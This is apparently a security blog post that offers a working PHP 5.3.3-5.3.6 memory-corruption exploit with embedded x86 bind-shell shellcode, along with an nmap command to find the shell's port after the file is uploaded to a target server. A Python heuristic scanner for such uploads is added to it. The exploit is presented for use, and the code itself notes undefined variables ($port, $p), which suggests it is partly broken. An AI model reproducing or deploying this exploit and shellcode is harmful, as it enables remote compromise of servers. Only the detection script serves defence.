PHP 5.3.3-5.3.6 Exploit + Bind Shell
Dear Readers, PHP 5.3.3-5.3.6 is still used and it's very easy to exploit.
All you need to do is find a way to upload a PHP file to the server, then call it.
The payload is a bind TCP shell that opens a port on the server between 4000 and 4500; to find the open one, just use Nmap:
nmap -sS -p 4000-4500 IP
<?php
error_reporting(E_ALL);

/* Initialize */
$a = 1;
$b = new stdClass();

/* Setup Error Handler */
set_error_handler("my_error");

/* Trigger the Code */
$addr = $a << $b;
$addr >>= 1;
restore_error_handler();

/* $port and $p are never assigned anywhere on this page; kept as-is. */
echo $port;
echo sprintf("%08x\n", $addr);
$addr += 10;
$b = str_repeat("A", 186) . pack("L", $addr);
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo "[+] popping shell, have fun (if you picked the right address...)\n";
flush();
sleep(1);
$var85 = socket_connect($var79, $b);

function my_error()
{
    global $p;
    $GLOBALS['a'] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
        "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" .
        "\x80\x5b\x5e\x52\x68\xff\x02" . $p . "\x6a\x10\x51\x50\x89" .
        "\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd" .
        "\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49" .
        "\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" .
        "\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xdb\x6a\x01\x58\xcd\x80";
    return 1;
}
?>
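For anyone on the receiving end of uploads like the one above, here is an added example (not part of the original post) that scores PHP files on the structural fingerprints this exploit uses: error-handler hijack, variable-by-variable shift, AF_UNIX socket with a packed address, NOP sled and int 0x80 bytes. The weights, threshold and both sample files are my own constructed assumptions.

```python
"""Heuristic flagging of uploaded PHP files that share the structural fingerprints
of the exploit above. Hits are weighted and summed; no byte-exact signature."""
import re
from typing import List, Tuple

# (pattern, weight, label); patterns taken from the exploit's own constructs
INDICATORS: List[Tuple[re.Pattern, int, str]] = [
    (re.compile(r'set_error_handler\s*\('), 1, "custom error handler"),
    (re.compile(r'new\s+stdClass\s*\('), 1, "stdClass instance"),
    (re.compile(r'\$\w+\s*<<\s*\$\w+'), 2, "shift of a variable by a variable"),
    (re.compile(r'socket_create\s*\(\s*AF_UNIX'), 2, "AF_UNIX socket"),
    (re.compile(r'str_repeat\s*\(\s*"A"\s*,\s*\d{2,}'), 2, "padding with repeated 'A'"),
    (re.compile(r'pack\s*\(\s*"L"'), 2, "packed 32-bit address"),
    (re.compile(r'(\\x90){8,}'), 3, "NOP sled"),
    (re.compile(r'\\xcd\\x80'), 3, "int 0x80 syscall bytes"),
]
THRESHOLD = 6  # assumption: tune against your own upload corpus

def score_php_source(src: str) -> Tuple[int, List[str]]:
    """Return (total weight, labels of matched indicators) for one file's text."""
    matched = [(w, label) for pat, w, label in INDICATORS if pat.search(src)]
    return sum(w for w, _ in matched), [label for _, label in matched]

def is_suspicious(src: str, threshold: int = THRESHOLD) -> bool:
    return score_php_source(src)[0] >= threshold

# Constructed samples (not real uploads): the exploit's skeleton with a short
# stand-in for the payload, and an ordinary upload that reuses some of the same calls.
SUSPICIOUS_SAMPLE = r'''<?php
set_error_handler("h");
$a = 1; $b = new stdClass();
$addr = $a << $b;
$b = str_repeat("A", 186) . pack("L", $addr);
$s = socket_create(AF_UNIX, SOCK_STREAM, 1);
function h() { $GLOBALS['a'] = "\x90\x90\x90\x90\x90\x90\x90\x90\xcd\x80"; }
?>'''
BENIGN_SAMPLE = r'''<?php
set_error_handler(function ($no, $str) { error_log($str); return true; });
$row = new stdClass(); $row->name = htmlspecialchars($_POST["name"] ?? "");
echo "Hello, " . $row->name;
?>'''

if __name__ == "__main__":
    for name, text in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        score, hits = score_php_source(text)
        print(f"{name}: score={score} flagged={is_suspicious(text)} hits={hits}")
```

Point `score_php_source` at the contents of each file in your upload directory; a benign file that only registers an error handler and builds a stdClass scores 2, well under the threshold.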
you’re welcome
IT-Securityguard